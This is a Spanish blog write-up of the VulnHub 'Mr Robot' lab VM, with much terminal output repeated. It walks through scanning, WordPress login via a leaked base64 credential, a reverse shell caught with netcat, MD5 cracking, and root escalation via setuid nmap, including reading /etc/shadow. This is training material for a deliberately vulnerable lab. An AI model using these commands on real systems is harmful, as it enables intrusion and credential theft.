Mr Robot (vulnhub) Write Up - Seguridad informática

Descripción :

Based on the show, Mr. Robot.

This VM has three keys hidden in different locations. Your goal is to find all three. Each key is progressively difficult to find.

The VM isn’t too difficult. There isn’t any advanced exploitation or reverse engineering. The level is considered beginner-intermediate.

Traducción libre :

Basada en la serie de tv Mr. Robot.

Esta maquina virtual tiene tres llaves escondidas en diferentes sitios. Tu misión es encontrar las tres. Cada llave es mas difícil de encontrar que la anterior.

Esta máquina no es difícil. No requiere explotación avanzada ni ingeniería inversa. El nivel se considera de principiante a medio.

Let’s Go!

# Nmap 7.01 scan initiated Mon Jul  4 17:21:13 2016 as: nmap -T5 -p- -oN nmap-mr-robot.txt 192.168.1.134
Nmap scan report for 192.168.1.134
Host is up (0.00028s latency).
Not shown: 65532 filtered ports
PORT    STATE  SERVICE
22/tcp  closed ssh
80/tcp  open   http
443/tcp open   https
MAC Address: 08:00:27:C7:03:E7 (Oracle VirtualBox virtual NIC)

# Nmap done at Mon Jul  4 17:22:08 2016 -- 1 IP address (1 host up) scanned in 54.52 seconds

# Nmap 7.01 scan initiated Mon Jul 4 17:21:13 2016 as: nmap -T5 -p- -oN nmap-mr-robot.txt 192.168.1.134

Nmap scan report for 192.168.1.134

Host is up (0.00028s latency).

Not shown: 65532 filtered ports

PORT STATE SERVICE

22/tcp closed ssh

80/tcp open http

443/tcp open https

MAC Address: 08:00:27:C7:03:E7 (Oracle VirtualBox virtual NIC)

# Nmap done at Mon Jul 4 17:22:08 2016 -- 1 IP address (1 host up) scanned in 54.52 seconds

# cat nikto.log
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP:          192.168.1.134
+ Target Hostname:    192.168.1.134
+ Target Port:        80
+ Start Time:         2016-07-04 19:25:00 (GMT-4)
---------------------------------------------------------------------------
+ Server: Apache
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ Retrieved x-powered-by header: PHP/5.5.29
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ Server leaks inodes via ETags, header found with file /robots.txt, fields: 0x29 0x52467010ef8ad
+ Uncommon header 'tcn' found, with contents: list
+ Apache mod_negotiation is enabled with MultiViews, which allows attackers to easily brute force file names. See http://www.wisec.it/sectou.php?id=4698ebdc59d15. The following alternatives for 'index' were found: index.html, index.php
+ OSVDB-3092: /admin/: This might be interesting...
+ Uncommon header 'link' found, with contents: <http://192.168.1.134/?p=23>; rel=shortlink
+ /readme.html: This WordPress file reveals the installed version.
+ /wp-links-opml.php: This WordPress script reveals the installed version.
+ OSVDB-3092: /license.txt: License file found may identify site software.
+ /admin/index.html: Admin login page/section found.
+ Cookie wordpress_test_cookie created without the httponly flag
+ /wp-login/: Admin login page/section found.
+ /wordpress/: A Wordpress installation was found.
+ /wp-admin/wp-login.php: Wordpress login found
+ /blog/wp-login.php: Wordpress login found
+ /wp-login.php: Wordpress login found
+ 7535 requests: 0 error(s) and 18 item(s) reported on remote host
+ End Time:           2016-07-04 19:27:14 (GMT-4) (134 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested

# cat nikto.log

- Nikto v2.1.6

---------------------------------------------------------------------------

+ Target IP: 192.168.1.134

+ Target Hostname: 192.168.1.134

+ Target Port: 80

+ Start Time: 2016-07-04 19:25:00 (GMT-4)

---------------------------------------------------------------------------

+ Server: Apache

+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS

+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type

+ Retrieved x-powered-by header: PHP/5.5.29

+ No CGI Directories found (use '-C all' to force check all possible dirs)

+ Server leaks inodes via ETags, header found with file /robots.txt, fields: 0x29 0x52467010ef8ad

+ Uncommon header 'tcn' found, with contents: list

+ Apache mod_negotiation is enabled with MultiViews, which allows attackers to easily brute force file names. See http://www.wisec.it/sectou.php?id=4698ebdc59d15. The following alternatives for 'index' were found: index.html, index.php

+ OSVDB-3092: /admin/: This might be interesting...

+ Uncommon header 'link' found, with contents: <http://192.168.1.134/?p=23>; rel=shortlink

+ /readme.html: This WordPress file reveals the installed version.

+ /wp-links-opml.php: This WordPress script reveals the installed version.

+ OSVDB-3092: /license.txt: License file found may identify site software.

+ /admin/index.html: Admin login page/section found.

+ Cookie wordpress_test_cookie created without the httponly flag

+ /wp-login/: Admin login page/section found.

+ /wordpress/: A Wordpress installation was found.

+ /wp-admin/wp-login.php: Wordpress login found

+ /blog/wp-login.php: Wordpress login found

+ /wp-login.php: Wordpress login found

+ 7535 requests: 0 error(s) and 18 item(s) reported on remote host

+ End Time: 2016-07-04 19:27:14 (GMT-4) (134 seconds)

---------------------------------------------------------------------------

+ 1 host(s) tested

# curl 192.168.1.134/robots.txt
User-agent: *
fsocity.dic
key-1-of-3.txt

# curl 192.168.1.134/robots.txt

User-agent: *

fsocity.dic

key-1-of-3.txt

# cat key-1-of-3.txt
073403c8a58a1f80d943455fb30724b9

1 2	# cat key-1-of-3.txt 073403c8a58a1f80d943455fb30724b9

# curl 192.168.1.134/license.txt |sort -n

do you want a password or something?
what you do just pull code from Rapid9 or some s@#% since when did you become a script kitty?
ZWxsaW90OkVSMjgtMDY1Mgo=

# echo "ZWxsaW90OkVSMjgtMDY1Mgo=" |base64 -d
elliot:ER28-0652

# curl 192.168.1.134/license.txt |sort -n

do you want a password or something?

what you do just pull code from Rapid9 or some s@#% since when did you become a script kitty?

ZWxsaW90OkVSMjgtMDY1Mgo=

# echo "ZWxsaW90OkVSMjgtMDY1Mgo=" |base64 -d

elliot:ER28-0652

Tenemos la pass del wordpress! una vez dentro subimos una shell como un plugin o editamos algun archivo archivo php, el objetivo es tener una shell en php.

Aquí una tool ya creada para subir como plugin : https://github.com/leonjza/wordpress-shell

Una vez que conseguimos una shell (preferiblemente una shell interactiva) continuamos.

root@kali:~# nc -lvvp 7788
listening on [any] 7788 ...
192.168.1.134: inverse host lookup failed: Unknown host
connect to [192.168.1.136] from (UNKNOWN) [192.168.1.134] 42727
python -c 'import pty; pty.spawn("/bin/bash")'
daemon@linux:/tmp$ id;uname -a;lsb_release -a
id;uname -a;lsb_release -a
uid=1(daemon) gid=1(daemon) groups=1(daemon)
Linux linux 3.13.0-55-generic #94-Ubuntu SMP Thu Jun 18 00:27:10 UTC 2015 x86_64 x86_64 x86_64 GNU/Linux
No LSB modules are available.
Distributor ID:	Ubuntu
Description:	Ubuntu 14.04.2 LTS
Release:	14.04
Codename:	trusty
daemon@linux:/tmp$

root@kali:~# nc -lvvp 7788

listening on [any] 7788 ...

192.168.1.134: inverse host lookup failed: Unknown host

connect to [192.168.1.136] from (UNKNOWN) [192.168.1.134] 42727

python -c 'import pty; pty.spawn("/bin/bash")'

daemon@linux:/tmp$ id;uname -a;lsb_release -a

id;uname -a;lsb_release -a

uid=1(daemon) gid=1(daemon) groups=1(daemon)

Linux linux 3.13.0-55-generic #94-Ubuntu SMP Thu Jun 18 00:27:10 UTC 2015 x86_64 x86_64 x86_64 GNU/Linux

No LSB modules are available.

Distributor ID: Ubuntu

Description: Ubuntu 14.04.2 LTS

Release: 14.04

Codename: trusty

daemon@linux:/tmp$

daemon@linux:/tmp$ ls -alR /home
ls -alR /home
/home:
total 12
drwxr-xr-x  3 root root 4096 Nov 13  2015 .
drwxr-xr-x 22 root root 4096 Sep 16  2015 ..
drwxr-xr-x  2 root root 4096 Jul  5 23:13 robot

/home/robot:
total 20
drwxr-xr-x 2 root  root  4096 Jul  5 23:13 .
drwxr-xr-x 3 root  root  4096 Nov 13  2015 ..
-rw------- 1 root  robot  658 Jul  6 01:45 .bash_history
-r-------- 1 robot robot   33 Nov 13  2015 key-2-of-3.txt
-rw-r--r-- 1 robot robot   39 Nov 13  2015 password.raw-md5
daemon@linux:/tmp$ cat /home/robot/key-2-of-3.txt
cat /home/robot/key-2-of-3.txt
cat: /home/robot/key-2-of-3.txt: Permission denied
daemon@linux:/tmp$ cat /home/robot/password.raw-md5
cat /home/robot/password.raw-md5
robot:c3fcd3d76192e4007dfb496cca67e13b

daemon@linux:/tmp$ ls -alR /home

ls -alR /home

/home:

total 12

drwxr-xr-x 3 root root 4096 Nov 13 2015 .

drwxr-xr-x 22 root root 4096 Sep 16 2015 ..

drwxr-xr-x 2 root root 4096 Jul 5 23:13 robot

/home/robot:

total 20

drwxr-xr-x 2 root root 4096 Jul 5 23:13 .

drwxr-xr-x 3 root root 4096 Nov 13 2015 ..

-rw------- 1 root robot 658 Jul 6 01:45 .bash_history

-r-------- 1 robot robot 33 Nov 13 2015 key-2-of-3.txt

-rw-r--r-- 1 robot robot 39 Nov 13 2015 password.raw-md5

daemon@linux:/tmp$ cat /home/robot/key-2-of-3.txt

cat /home/robot/key-2-of-3.txt

cat: /home/robot/key-2-of-3.txt: Permission denied

daemon@linux:/tmp$ cat /home/robot/password.raw-md5

cat /home/robot/password.raw-md5

robot:c3fcd3d76192e4007dfb496cca67e13b

Como vemos, tenemos dos archivos. Uno que aún no podemos leer con nuestra segunda key y otro con unas credenciales. El usuario «robot» y una password que según el nombre del archivo deducimos que esta encriptada en md5.

Una simple busqueda en google con la clave nos lleva a : http://md5cracker.org/decrypted-md5-hash/c3fcd3d76192e4007dfb496cca67e13b

La contraseña de «robot» es :

abcdefghijklmnopqrstuvwxyz

daemon@linux:/tmp$ su robot
su robot
Password: abcdefghijklmnopqrstuvwxyz

robot@linux:/tmp$ id
id
uid=1002(robot) gid=1002(robot) groups=1002(robot)
robot@linux:/tmp$ cat /home/robot/key-2-of-3.txt
cat /home/robot/key-2-of-3.txt
822c73956184f694993bede3eb39f959

daemon@linux:/tmp$ su robot

su robot

Password: abcdefghijklmnopqrstuvwxyz

robot@linux:/tmp$ id

uid=1002(robot) gid=1002(robot) groups=1002(robot)

robot@linux:/tmp$ cat /home/robot/key-2-of-3.txt

cat /home/robot/key-2-of-3.txt

822c73956184f694993bede3eb39f959

Vamos a por la última. Buscamos archivos con setuid activado.

robot@linux:/tmp$ ls -alt `find / -perm -4000 -type f 2>/dev/null`
-r-sr-xr-x 1 root root   14320 Nov 13  2015 /usr/lib/vmware-tools/bin64/vmware-user-suid-wrapper
-r-sr-xr-x 1 root root    9532 Nov 13  2015 /usr/lib/vmware-tools/bin32/vmware-user-suid-wrapper
-rwsr-xr-x 1 root root  504736 Nov 13  2015 /usr/local/bin/nmap
-rwsr-xr-x 1 root root  155008 Mar 12  2015 /usr/bin/sudo
-rwsr-xr-x 1 root root   10344 Feb 25  2015 /usr/lib/pt_chown
-rwsr-xr-x 1 root root   94792 Feb 12  2015 /bin/mount
-rwsr-xr-x 1 root root   69120 Feb 12  2015 /bin/umount
-rwsr-xr-x 1 root root  440416 May 12  2014 /usr/lib/openssh/ssh-keysign
-rwsr-xr-x 1 root root   44168 May  7  2014 /bin/ping
-rwsr-xr-x 1 root root   44680 May  7  2014 /bin/ping6
-rwsr-xr-x 1 root root   10240 Feb 25  2014 /usr/lib/eject/dmcrypt-get-device
-rwsr-xr-x 1 root root   36936 Feb 17  2014 /bin/su
-rwsr-xr-x 1 root root   32464 Feb 17  2014 /usr/bin/newgrp
-rwsr-xr-x 1 root root   46424 Feb 17  2014 /usr/bin/chfn
-rwsr-xr-x 1 root root   41336 Feb 17  2014 /usr/bin/chsh
-rwsr-xr-x 1 root root   68152 Feb 17  2014 /usr/bin/gpasswd
-rwsr-xr-x 1 root root   47032 Feb 17  2014 /usr/bin/passwd
robot@linux:/tmp$

robot@linux:/tmp$ ls -alt `find / -perm -4000 -type f 2>/dev/null`

-r-sr-xr-x 1 root root 14320 Nov 13 2015 /usr/lib/vmware-tools/bin64/vmware-user-suid-wrapper

-r-sr-xr-x 1 root root 9532 Nov 13 2015 /usr/lib/vmware-tools/bin32/vmware-user-suid-wrapper

-rwsr-xr-x 1 root root 504736 Nov 13 2015 /usr/local/bin/nmap

-rwsr-xr-x 1 root root 155008 Mar 12 2015 /usr/bin/sudo

-rwsr-xr-x 1 root root 10344 Feb 25 2015 /usr/lib/pt_chown

-rwsr-xr-x 1 root root 94792 Feb 12 2015 /bin/mount

-rwsr-xr-x 1 root root 69120 Feb 12 2015 /bin/umount

-rwsr-xr-x 1 root root 440416 May 12 2014 /usr/lib/openssh/ssh-keysign

-rwsr-xr-x 1 root root 44168 May 7 2014 /bin/ping

-rwsr-xr-x 1 root root 44680 May 7 2014 /bin/ping6

-rwsr-xr-x 1 root root 10240 Feb 25 2014 /usr/lib/eject/dmcrypt-get-device

-rwsr-xr-x 1 root root 36936 Feb 17 2014 /bin/su

-rwsr-xr-x 1 root root 32464 Feb 17 2014 /usr/bin/newgrp

-rwsr-xr-x 1 root root 46424 Feb 17 2014 /usr/bin/chfn

-rwsr-xr-x 1 root root 41336 Feb 17 2014 /usr/bin/chsh

-rwsr-xr-x 1 root root 68152 Feb 17 2014 /usr/bin/gpasswd

-rwsr-xr-x 1 root root 47032 Feb 17 2014 /usr/bin/passwd

robot@linux:/tmp$

Vemos que nmap tiene setuid y buscando en google encontramos :

http://blog.shellmates.org/2012/09/dont-setuid-nmap.html

https://synfin.net/papers/nmap-suid.txt

nmap –script <(echo 'os.execute("/bin/sh")') # setuid nmap privesc. Older version? try nmap –interactive @pentestcli

— Daniel Miller ✝ (@bonsaiviking) November 28, 2012

robot@linux:/tmp$ nmap -iL /etc/shadow localhost
nmap -iL /etc/shadow localhost

Starting nmap 3.81 ( http://www.insecure.org/nmap/ ) at 2016-07-06 02:03 UTC
Invalid host expression: root:$6$9xQC1KOf$5cmONytt0VF/wi3Np3jZGRSVzpGj6sXxVHkyJLjV4edlBxTVmW91pcGwAViViSWcAS/.OF0iuvylU5IznY2Re.:16753:0:99999:7::: -- colons only allowed in IPv6 addresses, and then you need the -6 switch
QUITTING!
robot@linux:/tmp$ nmap --interactive
nmap --interactive

Starting nmap V. 3.81 ( http://www.insecure.org/nmap/ )
Welcome to Interactive Mode -- press h <enter> for help
nmap> !id
!id
uid=1002(robot) gid=1002(robot) euid=0(root) groups=0(root),1002(robot)
waiting to reap child : No child processes
nmap> !ls /root
!ls /root
firstboot_done	key-3-of-3.txt
waiting to reap child : No child processes
nmap> !cat /root/key-3-of-3.txt
!cat /root/key-3-of-3.txt
04787ddef27c3dee1ee161b21670b4e4
waiting to reap child : No child processes
nmap>

robot@linux:/tmp$ nmap -iL /etc/shadow localhost

nmap -iL /etc/shadow localhost

Starting nmap 3.81 ( http://www.insecure.org/nmap/ ) at 2016-07-06 02:03 UTC

Invalid host expression: root:$6$9xQC1KOf$5cmONytt0VF/wi3Np3jZGRSVzpGj6sXxVHkyJLjV4edlBxTVmW91pcGwAViViSWcAS/.OF0iuvylU5IznY2Re.:16753:0:99999:7::: -- colons only allowed in IPv6 addresses, and then you need the -6 switch

QUITTING!

robot@linux:/tmp$ nmap --interactive

nmap --interactive

Starting nmap V. 3.81 ( http://www.insecure.org/nmap/ )

Welcome to Interactive Mode -- press h <enter> for help

nmap> !id

!id

uid=1002(robot) gid=1002(robot) euid=0(root) groups=0(root),1002(robot)

waiting to reap child : No child processes

nmap> !ls /root

!ls /root

firstboot_done key-3-of-3.txt

waiting to reap child : No child processes

nmap> !cat /root/key-3-of-3.txt

!cat /root/key-3-of-3.txt

04787ddef27c3dee1ee161b21670b4e4

waiting to reap child : No child processes

nmap>

como vemos, nmap nos deja ejecutar comandos con los permisos de root y obtenemos nuestra tercera llave.